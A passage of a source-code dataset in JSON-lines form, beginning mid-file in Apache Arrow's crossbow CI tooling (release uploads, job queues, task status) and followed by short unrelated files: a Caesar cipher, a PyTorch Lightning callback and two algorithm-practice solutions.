raise CrossbowError('Empty target commit for the release tag')\n\n        # remove the whole release if it already exists\n        try:\n            release = repo.release_from_tag(tag_name)\n        except github3.exceptions.NotFoundError:\n            pass\n        else:\n            release.delete()\n\n        release = repo.create_release(tag_name, target_commitish)\n        for pattern in patterns:\n            for path in glob.glob(pattern, recursive=True):\n                name = os.path.basename(path)\n                size = os.path.getsize(path)\n                mime = mimetypes.guess_type(name)[0] or 'application/zip'\n\n                logger.info(\n                    'Uploading asset `{}` with mimetype {} and size {}...'\n                    .format(name, mime, size)\n                )\n\n                if method == 'requests':\n                    self.github_upload_asset_requests(release, path, name=name,\n                                                      mime=mime)\n                elif method == 
'curl':\n                    self.github_upload_asset_curl(release, path, name=name,\n                                                  mime=mime)\n                else:\n                    raise CrossbowError(\n                        'Unsupported upload method {}'.format(method)\n                    )\n\n    def github_pr(self, title, head=None, base=None, body=None,\n                  github_token=None, create=False):\n        if create:\n            # Default value for base is the default_branch_name\n            base = self.default_branch_name if base is None else base\n        github_token = github_token or self.github_token\n        repo = self.as_github_repo(github_token=github_token)\n        if create:\n            return repo.create_pull(title=title, base=base, head=head,\n                                    body=body)\n        else:\n            # Retrieve open PR for base and head.\n            # There should be a single open one with that title.\n            for pull in repo.pull_requests(state=\"open\", head=head,\n                                           base=base):\n                if title in pull.title:\n                    return pull\n            raise CrossbowError(\n                f\"Pull request with Title: {title!r} not found \"\n                f\"in repository {repo.full_name!r}\"\n            )\n\n\nclass Queue(Repo):\n\n    def _latest_prefix_id(self, prefix):\n        pattern = re.compile(r'[\\w\\/-]*{}-(\\d+)'.format(prefix))\n        matches = list(filter(None, map(pattern.match, self.repo.branches)))\n        if matches:\n            latest = max(int(m.group(1)) for m in matches)\n        else:\n            latest = -1\n        return latest\n\n    def _prefix_contains_date(self, prefix):\n        prefix_date_pattern = re.compile(r'[\\w\\/-]*-(\\d+)-(\\d+)-(\\d+)')\n        match_prefix = prefix_date_pattern.match(prefix)\n        if match_prefix:\n            return match_prefix.group(0)[-10:]\n\n    def _latest_prefix_date(self, prefix):\n        pattern = re.compile(r'[\\w\\/-]*{}-(\\d+)-(\\d+)-(\\d+)'.format(prefix))\n        matches = list(filter(None, map(pattern.match, self.repo.branches)))\n        if matches:\n            latest = sorted([m.group(0) for m in matches])[-1]\n            # slice the trailing date part (YYYY-MM-DD)\n            latest = latest[-10:]\n        else:\n            latest = None\n        return latest\n\n    def _next_job_id(self, prefix):\n        \"\"\"Auto increments the branch's identifier based on the prefix\"\"\"\n        latest_id = self._latest_prefix_id(prefix)\n        return '{}-{}'.format(prefix, latest_id + 1)\n\n    def _new_hex_id(self, prefix):\n        \"\"\"Append a new id to branch's identifier based on the prefix\"\"\"\n        hex_id = uuid.uuid4().hex[:10]\n        return '{}-{}'.format(prefix, hex_id)\n\n    def latest_for_prefix(self, prefix):\n        prefix_date = self._prefix_contains_date(prefix)\n        if prefix.startswith(\"nightly\") and not prefix_date:\n            latest_id = self._latest_prefix_date(prefix)\n            if not latest_id:\n                raise RuntimeError(\n                    f\"No job has been submitted with prefix '{prefix}' yet\"\n                )\n            latest_id += \"-0\"\n        else:\n            latest_id = self._latest_prefix_id(prefix)\n            if latest_id < 0:\n                raise RuntimeError(\n                    f\"No job has been submitted with prefix '{prefix}' yet\"\n                )\n        job_name = '{}-{}'.format(prefix, latest_id)\n        return self.get(job_name)\n\n    def date_of(self, job):\n        # it'd be better to bind to the queue repository on deserialization\n        # and reorganize these methods to Job\n        branch_name = 'origin/{}'.format(job.branch)\n        branch = self.repo.branches[branch_name]\n        commit = self.repo[branch.target]\n        return date.fromtimestamp(commit.commit_time)\n\n    def jobs(self, pattern):\n        \"\"\"Return jobs sorted by their identifiers in reverse order\"\"\"\n        job_names = []\n        for name in self.repo.branches.remote:\n            origin, name = name.split('/', 1)\n            result = re.match(pattern, name)\n            if result:\n                job_names.append(name)\n\n        for name in sorted(job_names, reverse=True):\n            yield self.get(name)\n\n    def get(self, job_name):\n        branch_name = 'origin/{}'.format(job_name)\n        branch = self.repo.branches[branch_name]\n        try:\n            content = 
self.file_contents(branch.target, 'job.yml')\n        except KeyError:\n            raise CrossbowError(\n                'No job is found with name: {}'.format(job_name)\n            )\n\n        buffer = StringIO(content.decode('utf-8'))\n        job = yaml.load(buffer)\n        job.queue = self\n        return job\n\n    def put(self, job, prefix='build', increment_job_id=True):\n        if not isinstance(job, Job):\n            raise CrossbowError('`job` must be an instance of Job')\n        if job.branch is not None:\n            raise CrossbowError('`job.branch` is automatically generated, '\n                                'thus it must be blank')\n\n        job.queue = self\n        if increment_job_id:\n            # auto increment and set next job id, e.g. build-85\n            job.branch = self._next_job_id(prefix)\n        else:\n            # set new branch to something unique, e.g. build-41d017af40\n            job.branch = self._new_hex_id(prefix)\n\n        # create tasks' branches\n        for task_name, task in job.tasks.items():\n            # adding CI's name to the end of the branch in order to use skip\n            # patterns on travis and circleci\n            task.branch = '{}-{}-{}'.format(job.branch, task.ci, task_name)\n            params = {\n                **job.params,\n                \"arrow\": job.target,\n                \"job\": job,\n                \"queue_remote_url\": self.remote_url\n            }\n            files = task.render_files(job.template_searchpath, params=params)\n            branch = self.create_branch(task.branch, files=files)\n            self.create_tag(task.tag, branch.target)\n            task.commit = str(branch.target)\n\n        # create job's branch with its description\n        return self.create_branch(job.branch, files=job.render_files())\n\n\ndef get_version(root, **kwargs):\n    \"\"\"\n    Parse function for setuptools_scm that ignores tags for non-C++\n    subprojects, e.g. apache-arrow-js-XXX tags.\n    \"\"\"\n    from setuptools_scm.git import parse as parse_git_version\n\n    # query the calculated version based on the git tags\n    kwargs['describe_command'] = (\n        'git describe --dirty --tags --long --match \"apache-arrow-[0-9]*.*\"'\n    )\n    version = parse_git_version(root, **kwargs)\n    tag = str(version.tag)\n\n    # We may get a development tag for the next version, such as \"5.0.0.dev0\",\n    # or the tag of an already released version, such as \"4.0.0\".\n    # In the latter case, we need to increment the version so that the computed\n    # version comes after any patch release (the next feature version after\n    # 4.0.0 is 5.0.0).\n    pattern = r\"^(\\d+)\\.(\\d+)\\.(\\d+)\"\n    match = re.match(pattern, tag)\n    major, minor, patch = map(int, match.groups())\n    if 'dev' not in tag:\n        major += 1\n\n    return \"{}.{}.{}.dev{}\".format(major, minor, patch, version.distance or 0)\n\n\nclass Serializable:\n\n    @classmethod\n    def to_yaml(cls, representer, data):\n        tag = '!{}'.format(cls.__name__)\n        dct = {k: v for k, v in data.__dict__.items() if not k.startswith('_')}\n        return representer.represent_mapping(tag, dct)\n\n\nclass Target(Serializable):\n    \"\"\"\n    Describes target repository and revision the builds run against\n\n    This serializable data container holds information about arrow's\n    git remote, branch, sha and version number as well as some metadata\n    (currently only an email address where the notification should be sent).\n    \"\"\"\n\n    def __init__(self, head, branch, remote, version, r_version, email=None):\n        self.head = head\n        self.email = email\n        self.branch = branch\n        self.remote = remote\n        self.github_repo = \"/\".join(_parse_github_user_repo(remote))\n        self.version = version\n        self.r_version = r_version\n        self.no_rc_version = re.sub(r'-rc\\d+\\Z', '', version)\n        self.no_rc_r_version = re.sub(r'-rc\\d+\\Z', '', r_version)\n        # Semantic Versioning 1.0.0: https://semver.org/spec/v1.0.0.html\n        #\n        # > A pre-release version number MAY 
be denoted by appending an\n # > arbitrary string immediately following the patch version and a\n # > dash. The string MUST be comprised of only alphanumerics plus\n # > dash [0-9A-Za-z-].\n #\n # Example:\n #\n # '0.16.1.dev10' ->\n # '0.16.1-dev10'\n self.no_rc_semver_version = \\\n re.sub(r'\\.(dev\\d+)\\Z', r'-\\1', self.no_rc_version)\n # Substitute dev version for SNAPSHOT\n #\n # Example:\n #\n # '10.0.0.dev235' ->\n # '10.0.0-SNAPSHOT'\n self.no_rc_snapshot_version = re.sub(\n r'\\.(dev\\d+)$', '-SNAPSHOT', self.no_rc_version)\n\n @classmethod\n def from_repo(cls, repo, head=None, branch=None, remote=None, version=None,\n email=None):\n \"\"\"Initialize from a repository\n\n Optionally override detected remote, branch, head, and/or version.\n \"\"\"\n assert isinstance(repo, Repo)\n\n if head is None:\n head = str(repo.head.target)\n if branch is None:\n branch = repo.branch.branch_name\n if remote is None:\n remote = repo.remote_url\n if version is None:\n version = get_version(repo.path)\n if email is None:\n email = repo.user_email\n\n version_dev_match = re.match(r\".*\\.dev(\\d+)$\", version)\n if version_dev_match:\n with open(f\"{repo.path}/r/DESCRIPTION\") as description_file:\n description = description_file.read()\n r_version_pattern = re.compile(r\"^Version:\\s*(.*)$\",\n re.MULTILINE)\n r_version = re.findall(r_version_pattern, description)[0]\n if r_version:\n version_dev = int(version_dev_match[1])\n # \"1_0000_00_00 +\" is for generating a greater version\n # than YYYYMMDD. For example, 1_0000_00_01\n # (version_dev == 1 case) is greater than 2022_10_16.\n #\n # Why do we need a greater version than YYYYMMDD? It's\n # for keeping backward compatibility. We used\n # MAJOR.MINOR.PATCH.YYYYMMDD as our nightly package\n # version. (See also ARROW-16403). If we use \"9000 +\n # version_dev\" here, a developer that used\n # 9.0.0.20221016 can't upgrade to the later nightly\n # package unless we release 10.0.0. 
Because 9.0.0.9234\n                # or something is less than 9.0.0.20221016.\n                r_version_dev = 1_0000_00_00 + version_dev\n                # version: 10.0.0.dev234\n                # r_version: 9.0.0.9000\n                # -> 9.0.0.100000234\n                r_version = re.sub(r\"\\.9000\\Z\", f\".{r_version_dev}\", r_version)\n            else:\n                r_version = version\n        else:\n            r_version = version\n\n        return cls(head=head, email=email, branch=branch, remote=remote,\n                   version=version, r_version=r_version)\n\n    def is_default_branch(self):\n        return self.branch == 'main'\n\n\nclass Task(Serializable):\n    \"\"\"\n    Describes a build task and metadata required to render CI templates\n\n    A task is represented as a single git commit and branch containing jinja2\n    rendered files (currently appveyor.yml or .travis.yml configurations).\n\n    A task can't be directly submitted to a queue; it must belong to a job.\n    Each task's unique identifier is its branch name, which is generated after\n    submitting the job to a queue.\n    \"\"\"\n\n    def __init__(self, name, ci, template, artifacts=None, params=None):\n        assert ci in {\n            'circle',\n            'travis',\n            'appveyor',\n            'azure',\n            'github',\n            'drone',\n        }\n        self.name = name\n        self.ci = ci\n        self.template = template\n        self.artifacts = artifacts or []\n        self.params = params or {}\n        self.branch = None  # filled after adding to a queue\n        self.commit = None  # filled after adding to a queue\n        self._queue = None  # set by the queue object after put or get\n        self._status = None  # status cache\n        self._assets = None  # assets cache\n\n    def render_files(self, searchpath, params=None):\n        params = {**self.params, **(params or {}), \"task\": self}\n        try:\n            rendered = _render_jinja_template(searchpath, self.template,\n                                              params=params)\n        except jinja2.TemplateError as e:\n            raise RuntimeError(\n                'Failed to render template `{}` with {}: {}'.format(\n                    self.template, e.__class__.__name__, str(e)\n                )\n            )\n\n        tree = {**_default_tree, self.filename: rendered}\n        return _unflatten_tree(tree)\n\n    @property\n    def tag(self):\n        return self.branch\n\n    @property\n    def filename(self):\n        config_files = {\n            'circle': '.circleci/config.yml',\n            'travis': '.travis.yml',\n            'appveyor': 'appveyor.yml',\n            'azure': 'azure-pipelines.yml',\n            'github': '.github/workflows/crossbow.yml',\n            'drone': '.drone.yml',\n        }\n        return config_files[self.ci]\n\n    def status(self, force_query=False):\n        _status = getattr(self, '_status', None)\n        if force_query or _status is None:\n            github_commit = self._queue.github_commit(self.commit)\n            self._status = TaskStatus(github_commit)\n        return self._status\n\n    def assets(self, force_query=False, validate_patterns=True):\n        _assets = getattr(self, '_assets', None)\n        if force_query or _assets is None:\n            github_release = self._queue.github_release(self.tag)\n            self._assets = TaskAssets(github_release,\n                                      artifact_patterns=self.artifacts,\n                                      validate_patterns=validate_patterns)\n        return self._assets\n\n\nclass TaskStatus:\n    \"\"\"\n    Combine the results from status and checks API to a single state.\n\n    Azure pipelines uses checks API which doesn't provide a combined\n    interface like status API does, so we need to manually combine\n    both the commit statuses and the commit checks coming from\n    different API endpoints\n\n    Status.state: error, failure, pending or success, default pending\n    CheckRun.status: queued, in_progress or completed, default: queued\n    CheckRun.conclusion: success, failure, neutral, cancelled, timed_out\n                         or action_required, only set if\n                         CheckRun.status == 'completed'\n\n    1. Convert CheckRun's status and conclusion to one of Status.state\n    2. 
Merge the states based on the following rules:\n       - failure if any of the contexts report as error or failure\n       - pending if there are no statuses or a context is pending\n       - success if the latest status for all contexts is success\n       - error otherwise.\n\n    Parameters\n    ----------\n    commit : github3.Commit\n        Commit to query the combined status for.\n\n    Returns\n    -------\n    TaskStatus(\n        combined_state='error|failure|pending|success',\n        github_status='original github status object',\n        github_check_runs='github checks associated with the commit',\n        total_count='number of statuses and checks'\n    )\n    \"\"\"\n\n    def __init__(self, commit):\n        status = commit.status()\n        check_runs = list(commit.check_runs())\n        states = [s.state for s in status.statuses]\n\n        for check in check_runs:\n            if check.status == 'completed':\n                if check.conclusion in {'success', 'failure'}:\n                    states.append(check.conclusion)\n                elif check.conclusion in {'cancelled', 'timed_out',\n                                          'action_required'}:\n                    states.append('error')\n                # omit `neutral` conclusion\n            else:\n                states.append('pending')\n\n        # it could be more efficient, but the following is more descriptive\n        combined_state = 'error'\n        if len(states):\n            if any(state in {'error', 'failure'} for state in states):\n                combined_state = 'failure'\n            elif any(state == 'pending' for state in states):\n                combined_state = 'pending'\n            elif all(state == 'success' for state in states):\n                combined_state = 'success'\n\n        # show link to the actual build, some of the CI providers implement\n        # the statuses API others implement the checks API, so display both\n        build_links = [s.target_url for s in status.statuses]\n        build_links += [c.html_url for c in check_runs]\n\n        self.combined_state = combined_state\n        self.github_status = status\n        self.github_check_runs = check_runs\n        self.total_count = len(states)\n        self.build_links = build_links\n
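\n\n# Hedged illustration (added for clarity, not in the original file): under the\n# merge rules above, states ['success', 'pending'] resolve to 'pending',\n# ['success', 'failure'] to 'failure', all-'success' to 'success', and an\n# empty state list stays 'error'.\n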
\nclass TaskAssets(dict):\n\n    def __init__(self, github_release, artifact_patterns,\n                 validate_patterns=True):\n        # HACK(kszucs): don't expect uploaded assets if no artifacts were\n        # defined for the tasks in order to spare a bit of github rate limit\n        if not artifact_patterns:\n            return\n\n        if github_release is None:\n            github_assets = {}  # no assets have been uploaded for the task\n        else:\n            github_assets = {a.name: a for a in github_release.assets()}\n\n        if not validate_patterns:\n            # shortcut to avoid pattern validation and just set all artifacts\n            return self.update(github_assets)\n\n        for pattern in artifact_patterns:\n            # artifact can be a regex pattern\n            compiled = re.compile(f\"^{pattern}$\")\n            matches = list(\n                filter(None, map(compiled.match, github_assets.keys()))\n            )\n            num_matches = len(matches)\n\n            # validate artifact pattern matches single asset\n            if num_matches == 0:\n                self[pattern] = None\n            elif num_matches == 1:\n                self[pattern] = github_assets[matches[0].group(0)]\n            else:\n                raise CrossbowError(\n                    'Only a single asset should match pattern `{}`, there are '\n                    'multiple ones: {}'.format(\n                        pattern, ', '.join(m.group(0) for m in matches)\n                    )\n                )\n\n    def missing_patterns(self):\n        return [pattern for pattern, asset in self.items() if asset is None]\n\n    def uploaded_assets(self):\n        return [asset for asset in self.values() if asset is not None]\n\n\nclass Job(Serializable):\n    \"\"\"Describes multiple tasks against a single target repository\"\"\"\n\n    def __init__(self, target, tasks, params=None, template_searchpath=None):\n        if not tasks:\n            raise ValueError('no tasks were provided for the job')\n        if not all(isinstance(task, Task) for task in tasks.values()):\n            raise ValueError('each `tasks` must be an instance of Task')\n        if not isinstance(target, Target):\n            raise ValueError('`target` must be an instance of Target')\n        if params is not None and not isinstance(params, dict):\n            raise ValueError('`params` must be an instance of dict')\n\n        self.target = target\n        self.tasks = tasks\n        self.params = params or {}  # additional parameters for the tasks\n        self.branch = None  # filled after adding to a queue\n        self._queue = None  # set by the queue object after put or get\n        if template_searchpath is None:\n            self._template_searchpath = ArrowSources.find().path\n        else:\n            self._template_searchpath = template_searchpath\n\n    def render_files(self):\n        with StringIO() as buf:\n            yaml.dump(self, buf)\n            content = buf.getvalue()\n        tree = {**_default_tree, \"job.yml\": content}\n        return _unflatten_tree(tree)\n\n    def render_tasks(self, params=None):\n        result = {}\n        params = {\n            **self.params,\n            \"arrow\": self.target,\n            \"job\": self,\n            **(params or {})\n        }\n        for task_name, task in self.tasks.items():\n            files = task.render_files(self._template_searchpath, params)\n            result[task_name] = files\n        return result\n\n    @property\n    def template_searchpath(self):\n        return self._template_searchpath\n\n    @property\n    def queue(self):\n        assert isinstance(self._queue, Queue)\n        return self._queue\n\n    @queue.setter\n    def queue(self, queue):\n        assert isinstance(queue, Queue)\n        self._queue = queue\n        for task in self.tasks.values():\n            task._queue = queue\n\n    @property\n    def email(self):\n        return os.environ.get('CROSSBOW_EMAIL', self.target.email)\n\n    @property\n    def date(self):\n        return self.queue.date_of(self)\n\n    def show(self, stream=None):\n        return yaml.dump(self, stream=stream)\n\n    @classmethod\n    def from_config(cls, config, target, tasks=None, groups=None, params=None):\n        \"\"\"\n        Instantiate a job based on a config.\n\n        Parameters\n        ----------\n        config : dict\n            Deserialized content of tasks.yml\n        target : Target\n            Describes target repository and revision the builds run against.\n        tasks : Optional[List[str]], default None\n            List of glob patterns for matching task names.\n        groups : Optional[List[str]], default None\n            List of exact group names matching predefined task sets in the\n            config.\n        params : Optional[Dict[str, str]], default None\n            Additional rendering parameters for the task templates.\n\n        Returns\n        -------\n        Job\n\n        Raises\n        ------\n        Exception:\n            If invalid groups or tasks have been passed.\n        \"\"\"\n        task_definitions = config.select(tasks, groups=groups)\n\n        # instantiate the tasks\n        tasks = {}\n        versions = {\n            'version': target.version,\n            'no_rc_version': target.no_rc_version,\n            'no_rc_semver_version': target.no_rc_semver_version,\n            'no_rc_snapshot_version': target.no_rc_snapshot_version,\n            'r_version': target.r_version,\n            'no_rc_r_version': target.no_rc_r_version,\n        }\n        for task_name, task in task_definitions.items():\n            task = task.copy()\n            artifacts = task.pop('artifacts', None) or []  # because of yaml\n            artifacts = [fn.format(**versions) for fn in artifacts]\n            tasks[task_name] = Task(task_name, artifacts=artifacts, **task)\n        return cls(target=target, tasks=tasks, params=params,\n                   template_searchpath=config.template_searchpath)\n\n    def is_finished(self):\n        for task in self.tasks.values():\n            status = task.status(force_query=True)\n            if status.combined_state == 'pending':\n                return False\n        return True\n\n    def wait_until_finished(self, poll_max_minutes=120,\n                            poll_interval_minutes=10):\n        started_at = time.time()\n        while True:\n            if self.is_finished():\n                break\n\n            waited_for_minutes = (time.time() - started_at) / 60\n            if 
waited_for_minutes > poll_max_minutes:\n                msg = ('Exceeded the maximum amount of time waiting for job '\n                       'to finish, waited for {} minutes.')\n                raise RuntimeError(msg.format(waited_for_minutes))\n\n            logger.info('Waiting {} minutes and then checking again'\n                        .format(poll_interval_minutes))\n            time.sleep(poll_interval_minutes * 60)\n\n\nclass Config(dict):\n\n    def __init__(self, tasks, template_searchpath):\n        super().__init__(tasks)\n        self.template_searchpath = template_searchpath\n\n    @classmethod\n    def load_yaml(cls, path):\n        path = Path(path)\n        searchpath = path.parent\n        rendered = _render_jinja_template(searchpath, template=path.name,\n                                          params={})\n        config = yaml.load(rendered)\n        return cls(config, template_searchpath=searchpath)\n\n    def show(self, stream=None):\n        return yaml.dump(dict(self), stream=stream)\n\n    def select(self, tasks=None, groups=None):\n        config_groups = dict(self['groups'])\n        config_tasks = dict(self['tasks'])\n        valid_groups = set(config_groups.keys())\n        valid_tasks = set(config_tasks.keys())\n        group_allowlist = list(groups or [])\n        task_allowlist = list(tasks or [])\n\n        # validate that the passed groups are defined in the config\n        requested_groups = set(group_allowlist)\n        invalid_groups = requested_groups - valid_groups\n        if invalid_groups:\n            msg = 'Invalid group(s) {!r}. Must be one of {!r}'.format(\n                invalid_groups, valid_groups\n            )\n            raise CrossbowError(msg)\n\n        # treat the task names as glob patterns to select tasks more easily\n        requested_tasks = set()\n        for pattern in task_allowlist:\n            matches = fnmatch.filter(valid_tasks, pattern)\n            if len(matches):\n                requested_tasks.update(matches)\n            else:\n                raise CrossbowError(\n                    \"Unable to match any tasks for `{}`\".format(pattern)\n                )\n\n        requested_group_tasks = set()\n        for group in group_allowlist:\n            # separate the patterns from the blocklist patterns\n            task_patterns = list(config_groups[group])\n            task_blocklist_patterns = [\n                x.strip(\"~\") for x in task_patterns if x.startswith(\"~\")]\n            task_patterns = [x for x in task_patterns if not x.startswith(\"~\")]\n\n            # treat the task names as glob patterns to select tasks more easily\n            for pattern in task_patterns:\n                matches = fnmatch.filter(valid_tasks, pattern)\n                if len(matches):\n                    requested_group_tasks.update(matches)\n                else:\n                    raise CrossbowError(\n                        \"Unable to match any tasks for `{}`\".format(pattern)\n                    )\n\n            # remove any tasks that are negated with ~task-name\n            for block_pattern in task_blocklist_patterns:\n                matches = fnmatch.filter(valid_tasks, block_pattern)\n                if len(matches):\n                    requested_group_tasks = requested_group_tasks.difference(\n                        matches)\n                else:\n                    raise CrossbowError(\n                        \"Unable to match any tasks for `{}`\".format(block_pattern)\n                    )\n\n        requested_tasks = requested_tasks.union(requested_group_tasks)\n\n        # validate that the passed and matched tasks are defined in the config\n        invalid_tasks = requested_tasks - valid_tasks\n        if invalid_tasks:\n            msg = 'Invalid task(s) {!r}. 
Must be one of {!r}'.format(\n                invalid_tasks, valid_tasks\n            )\n            raise CrossbowError(msg)\n\n        return {\n            task_name: config_tasks[task_name] for task_name in requested_tasks\n        }\n\n    def validate(self):\n        # validate that the task groups are properly referring to the tasks\n        for group_name, group in self['groups'].items():\n            for pattern in group:\n                # remove the negation character for blocklisted tasks\n                pattern = pattern.strip(\"~\")\n                tasks = self.select(tasks=[pattern])\n                if not tasks:\n                    raise CrossbowError(\n                        \"The pattern `{}` defined for task group `{}` is not \"\n                        \"matching any of the tasks defined in the \"\n                        \"configuration file.\".format(pattern, group_name)\n                    )\n\n        # validate that the tasks are constructible\n        for task_name, task in self['tasks'].items():\n            try:\n                Task(task_name, **task)\n            except Exception as e:\n                raise CrossbowError(\n                    'Unable to construct a task object from the '\n                    'definition of task `{}`. The original error message '\n                    'is: `{}`'.format(task_name, str(e))\n                )\n\n        # Get the default branch name from the repository\n        arrow_source_dir = ArrowSources.find()\n        repo = Repo(arrow_source_dir.path)\n\n        # validate that the defined tasks are renderable, in order to do that\n        # define the required object with dummy data\n        target = Target(\n            head='e279a7e06e61c14868ca7d71dea795420aea6539',\n            branch=repo.default_branch_name,\n            remote='https://github.com/apache/arrow',\n            version='1.0.0dev123',\n            r_version='0.13.0.100000123',\n            email='dummy@example.ltd'\n        )\n        job = Job.from_config(config=self,\n                              target=target,\n                              tasks=self['tasks'],\n                              groups=self['groups'],\n                              params={})\n\n        for task_name, task in self['tasks'].items():\n            task = Task(task_name, **task)\n            files = task.render_files(\n                self.template_searchpath,\n                params=dict(\n                    arrow=target,\n                    job=job,\n                    queue_remote_url='https://github.com/org/crossbow'\n                )\n            )\n            if not files:\n                raise CrossbowError('No files have been rendered for task `{}`'\n                                    .format(task_name))\n\n\n# configure yaml serializer\nyaml = YAML()\nyaml.register_class(Job)\nyaml.register_class(Task)\nyaml.register_class(Target)\nyaml.register_class(Queue)\nyaml.register_class(TaskStatus)\n","repo_name":"apache/arrow","sub_path":"dev/archery/archery/crossbow/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":49457,"program_lang":"python","lang":"en","doc_type":"code","stars":12777,"dataset":"github-code","pt":"29"} +{"seq_id":"72269816397","text":"# runs the Caesar cipher\n\n# define the alphabet twice so positive shifts can wrap past 'z'\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n# define cipher function\ndef caesar(start_text, shift_amount, cipher_direction):\n    final_text = \"\"\n    if cipher_direction == \"decode\":\n        shift_amount *= -1\n    for char in start_text:\n        if char in alphabet:\n            slot = alphabet.index(char)\n            new_slot = slot + shift_amount\n            final_text += alphabet[new_slot]\n        else:\n            final_text += char\n    print(f\"{cipher_direction}d message: {final_text}\")\n
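\n# Example (added for illustration): caesar(start_text='hello', shift_amount=3,\n# cipher_direction='encode') prints 'encoded message: khoor'; decoding 'khoor'\n# with shift 3 restores 'hello'. Non-alphabet characters pass through unchanged.\n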
\n# stop / go logic\nquit_or_not = False\nwhile not quit_or_not:\n\n    direction = input(\"input 'encode' to encrypt, input 'decode' to decrypt:\\n\")\n    text = input(\"input your message:\\n\").lower()\n    shift = int(input(\"input the shift number:\\n\"))\n    # cap out at max number of letters\n    shift = shift % 26\n    # call actual function\n    caesar(start_text=text, shift_amount=shift, cipher_direction=direction)\n    # determine if we call again\n    again = input(\"input 'yes' to cipher more or 'no' to end.\\n\")\n    if again == \"no\":\n        quit_or_not = True\n        print(\"👍\")\n","repo_name":"swantron/python_tools","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15772342288","text":"import torch\nfrom pytorch_lightning.callbacks import Callback\n\n\nclass RefineSolution(Callback):\n    def __init__(self, thr: float = 1e-5):\n        super().__init__()\n        self.monitor = 'valid_loss'\n        self.thr = thr\n        self.is_enabled = False\n\n    def on_validation_end(self, trainer, model):\n        logs = trainer.callback_metrics\n        metric = logs.get(self.monitor)\n        if (not self.is_enabled) and metric is not None and metric < self.thr:\n            print('Switched to LBFGS')\n            trainer.optimizers = [torch.optim.LBFGS(model.parameters(), lr=1e-4)]\n            self.is_enabled = True\n        # trainer.lr_schedulers = trainer.configure_schedulers([new_schedulers])","repo_name":"Chutlhu/TurboSuperResultion","sub_path":"turboflow/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"6697602908","text":"import sys\ninput = sys.stdin.readline\n\nN = int(input())\narr = [list(map(int, input().split())) for _ in range(N)]\nmax_sum = [[0,0,0],[0,0,0]]\nmin_sum = [[0,0,0],[0,0,0]]\n# Sliding window down to row N. // Uses DP as well, but instead of storing the whole DP table, only the previous row and the row currently being computed are kept.\nfor i in range(0,N):\n\n    max_sum[1][0] = max(max_sum[0][1], max_sum[0][0]) + arr[i][0]\n    max_sum[1][1] = max(max_sum[0][1], max_sum[0][2], max_sum[0][0]) + arr[i][1]\n    max_sum[1][2] = max(max_sum[0][1], max_sum[0][2]) + arr[i][2]\n\n    min_sum[1][0] = min(min_sum[0][0], min_sum[0][1]) + arr[i][0]\n    min_sum[1][1] = min(min_sum[0][1], min_sum[0][2], min_sum[0][0]) + arr[i][1]\n    min_sum[1][2] = min(min_sum[0][1], min_sum[0][2]) + arr[i][2]\n\n    max_sum.append(max_sum.pop(0))\n    min_sum.append(min_sum.pop(0))\n\nprint(max(max_sum[0]), min(min_sum[0]))\n\n# The version below works the same way, but performs each update in a single line so values are not overwritten mid-computation (designed to avoid a tmp array; the current values are refreshed in place without keeping the previous ones).\n# import sys\n# input = sys.stdin.readline\n# n = int(input())\n# s = [list(map(int, input().split())) for i in range(n)]\n# lax, cax, rax = s[0][0], s[0][1], s[0][2]\n# lin, cin, rin = s[0][0], s[0][1], s[0][2]\n# for i in range(1, n):\n#     lax, cax, rax = max(lax, cax) + s[i][0], max(lax, cax, rax) + s[i][1], max(cax, rax) + s[i][2]\n#     lin, cin, rin = min(lin, cin) + s[i][0], min(lin, cin, rin) + s[i][1], min(cin, rin) + s[i][2]\n# print(max(lax, cax, rax), min(lin, cin, rin))","repo_name":"chaselover/practiceAlgorithm","sub_path":"2096내려가기.py","file_name":"2096내려가기.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"31044566950","text":"class Solution:\n    def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n        # The following is based on a reference solution whose runtime beat 100% of users\n        n = len(temperatures)\n        ans = [0] * n\n        stack = []\n        for i in range(n):\n            while stack and temperatures[i] > temperatures[stack[-1]]:\n                index = stack.pop()\n                ans[index] = i - index\n            stack.append(i)\n        return ans\n
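\n        # Worked example (added for illustration): temperatures = [73,74,75,71,69,72,76,73]\n        # gives [1,1,4,2,1,1,0,0]; each index is pushed and popped at most once,\n        # so the stack solution above runs in O(n).\n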
\n        # The following code was completed by consulting a reference solution; runtime beats 6.41% of users\n        # n = len(temperatures)\n        # ans = [0 for _ in range(n)]\n        # stack = list()\n        # for i in range(n):\n        #     if len(stack) == 0: stack.append(i)\n        #     else:\n        #         while len(stack) > 0 and temperatures[i] > temperatures[stack[len(stack)-1]]:\n        #             ans[stack[len(stack)-1]] = i-stack[len(stack)-1]\n        #             stack.pop()\n        #         stack.append(i)\n        # return ans\n\n        # The following was the initial approach to this problem; it exceeds the time limit\n        # n = len(temperatures)\n        # if n == 1: return [0]\n        # l, r = 0, 1\n        # # Basic idea: fix pointer l as the index of the current loop and let r search for the index of the next higher temperature; if found, append it to the answer list; if r reaches n without finding one, none exists, so append 0 to the answer\n        # # Optimization: suppose r is the answer for t[l]; if t[l+1]=t[l], the answer for t[l+1] is also r; if t[l+1]>t[l], the index answering t[l+1] must be greater than r; if t[l+1] temperatures[l-1]: r = pre\n        #     else: r = l+1\n        #     while r < n:\n        #         if temperatures[r] > temperatures[l]:\n        #             ans.append(r-l)\n        #             pre = r\n        #             break\n        #         r += 1\n        #     return ans\n","repo_name":"ColdCode0214/LeetCode_local","sub_path":"038-每日温度.py","file_name":"038-每日温度.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"29369880621","text":"from api import db\nfrom sqlalchemy.exc import 